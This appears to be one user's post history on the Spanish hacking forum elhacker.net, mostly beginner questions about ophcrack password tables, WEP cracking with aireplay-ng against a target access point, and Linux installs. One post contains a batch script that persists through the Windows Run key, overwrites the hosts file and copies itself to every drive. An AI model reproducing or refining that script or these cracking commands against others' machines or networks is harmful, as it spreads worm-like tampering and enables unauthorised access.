elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: 1 2 [3]
21  Seguridad Informática / Seguridad / Dudas para instalar tablas en OPHCRACK 3.2 (solucionado) en: 14 Diciembre 2010, 13:09 pm
Felices fiestas !!! ;D ;D eso de antemano.


Bueno llendo al grano, tengo el ophcrack 3.2 preparado para arrancar desde USB, tal y como me lo he descargado, me saca la mayoria de las contraseñas, pero cuando pongo, para probarlo, algunas letras con mayusculas. otras en minusculas ,ya no me la saca, segui buscando información y encontre que tiene unas "tablas" o librerias que al añadirselas aumenta la efectividad, añadiendo asi mayusculas, caracteres especiales y numeros.

hasta hay perfecto, pero lo que me falla es que ahora que tengo todo descargado, no sé, no logro conseguir añadir las tablas... me podeis hechar una mano?


muchisimas gracias y de nuevo felices fiestas! ;-)


Solución:


Porque las cosas siempre son mas simples de lo que parecen?

lo unico que hay que hacer es descargarte las tablas que te las puedes descargar de aquí:
las tienes que descomprimir en una carpeta las pones una aparte de la otra.

Cuando cargues el sistema operativo, se te carga el programa y pone arriba TABLAS
pinchas hay y aparece una ventana, abajo dice INSTALAR o INSTALL le das y simplemente buscas la carpeta donde lo descomprimiste y en cuestion de unos segundillos se instala y esta lista para usarse...


bueno espero que le sirva a mas personas un saludo



Norlack
22  Sistemas Operativos / GNU/Linux / Problema al instalar Ubuntu 10.10 server con windos xp y 2003 server en: 22 Octubre 2010, 10:32 am
Buenas tengo un problema, y ya estoy como amargao ya :-X. Tengo instalado windows 2003 server, win XP en ese orden y me funciona perfecto. Problema:

al instalar Ubuntu Server 10.10 me chafa el windws 2003 server diciendo que falla el archivo:

ntoskrnl.exe




he intentado copiar ese archivo de otra maquina y a traves de guadalinex lo copio en la carpeta especifica y me sige el mismo problema


pues si me podirais guiar un poco estaria bien gracias de todas maneras!
23  Seguridad Informática / Wireless en Linux / Problema al descifrar clabe web wifiway en: 6 Octubre 2010, 11:37 am
Saludos.

Tengo un problema con wifiway, trato de "quitar" mi propia clave WEP.

Llego a recojer muchos DATAS pero a la ora de utilizar la opcion de crackear me da un error, next try 5000 IVS. que lo pruebe cuando coja 5000 ivs mas?
por eso preguntaba si alguien le habia pasado algo por el estilo, es al utilizar la opcion de crakear cuando sale la pantallita blanca me aparece eso de los ivs y de hay no pasa

pero mas de 90.000 no son suficientes?, he probado con las 3 opciones. La primera vez lo probe con 23.000 y picos la otra con 40.000 y pico y la ultima con 93.000 y pico, nose si hago algo mal, pero segun e leido en todos los manuales que e leido (unos 15) hago lo mismo que ponen y nada...


Nose que mas hacer si alguien pudiera hecharme una mano se lo agradeceria mientras seguire intentando, un saludo.
24  Seguridad Informática / Hacking Wireless / Problema con WifiWay en: 4 Octubre 2010, 20:45 pm
Saludos.

Tengo un problema con wifiway, trato de "quitar" mi propia clave WEP.

Llego a recojer muchos DATAS pero a la ora de utilizar la opcion de crackear me da un error (sino me equivoco, algun problema con IV's) , he probado con las 3 opciones. La primera vez lo probe con 23.000 y picos la otra con 40.000 y pico y la ultima con 93.000 y pico, nose si hago algo mal, pero segun e leido en todos los manuales que e leido (unos 15) hago lo mismo que ponen y nada...


Nose que mas hacer si alguien pudiera hecharme una mano se lo agradeceria mientras seguire intentando, un saludo.
25  Seguridad Informática / Wireless en Linux / problema con backtrack 4 al asociarme en: 30 Septiembre 2010, 08:39 am
Mi problema, por asi llamarlo, es que no consigo asociarme, he intentado de diversas formas como estas:

aireplay-ng -1 0 -e ESSID -a MacVictima -h MiMac wlan0

aireplay-ng -3 -x600 -b Bssid -h MiMac wlan0


aireplay-ng -1 30 -o 1 -e ESSID -a MacVictima -h MiMac wlan0
aireplay-ng -2 p 0841 -c ff:ff:ff:ff:ff:ff -b MacVictima -h MiMac wlan0


aireplay- ng - 1 0 - a ff:ff:ff:ff:ff:ff wlan0

aireplay- ng - 3 - b ff:ff:ff:ff:ff:ff wlan0


para asociarme con un cliente conectado y tb e probado para hacer una peticion aunque no haya cliente y nada no me vale de ninguna de esas formas y no es por los datas puesto que la señal me los coje bien en 5 min me coje los 3500 o asi pero es por aprender lo de AIREPLAY-NG bueno... si saben algo pues agradeceria mucho que me hecharan una mano


muchisimas gracias de antemano.
26  Seguridad Informática / Wireless en Linux / fallo en back track 4 en: 28 Septiembre 2010, 20:23 pm
buenas compis.


tengo una pequeña duda, aver va todo perfecto me coje la red y la empieza a cojer paquetes ai todo bien lo que pasa que va muy lento, segun tengo entendido tengo que inllectar yo paquetes para hacer trafico de paquetes, vale ai todo perfecto ago esto:

"aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0"

y aparece lo siguiente:

"read 7218 packtes (go 0 arp requests and 0 ACKs), sent 0 packets...




alguien me explica porque pasa esto?? gracias y un saludo!!
27  Sistemas Operativos / GNU/Linux / Tengo un problema con Back Track 4 en: 24 Septiembre 2010, 13:31 pm
es un portable y empieza a cargar correctamente y tal pero llega un momento que me dice:

root@bt:~*     se que esto es algun comando que tengo que añadir pero nose que pasa




si me podeis hechar una mano muchas gracias.
28  Informática / Software / Se puede poner 2 S.O en un USB? en: 23 Septiembre 2010, 13:22 pm
Buenas, mira mi duda es clara necesito poner dos sistemas operativos en mi USB, e logrado particionar el pendriver en dos particiones ( pronto are un TUTORIAL para explicar como es) el problema es que aun asi no consigo poner dos SO. Creo que tendria que añadirle un gestor de arranque para poder elegir o nose... bueno si saben algo me gustaria que me hecharan una mano.


gracias de antemano ;D
29  Programación / Scripting / esta bien mi bat? en: 21 Septiembre 2010, 20:17 pm
copy %0 C:\

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v hola.bat  /d c:\hola.bat /f

echo 127.0.0.1   www.xxx.com > C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1   www.fotolog.com >> C:\WINDOWS\system32\drivers\etc\hosts

for %%x in ("B", "C", "D", "E", "F", "G", "H", "I", "J", "K") do (copy /y %0 "%%~x:\")
bueno basicamente es eso, lo que e hecho, lo unico que hace es cambiar el fichero Hosts , que es para capar el acceso a las paginas pero sinceramente no tengo ni idea si esta bien eso o no, otra de las cosas que he exo es atraves del comando for ( gracia a la ayuda prestada por los miembros de este foro)
es que dicho bat se copie. si alguien se pudiera tomar la molestia de mirarlo y decirme que tal se lo agradeceria, porque, una vez tenga esto completo quiero tambien intentar hacer un autorun, pero bueno eso son palabras mayores XD

un saludo y de nuevo gracias.

bueno si me pueden ayudar se lo agradeceria muchisimo. gracias por adelantado ;D
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines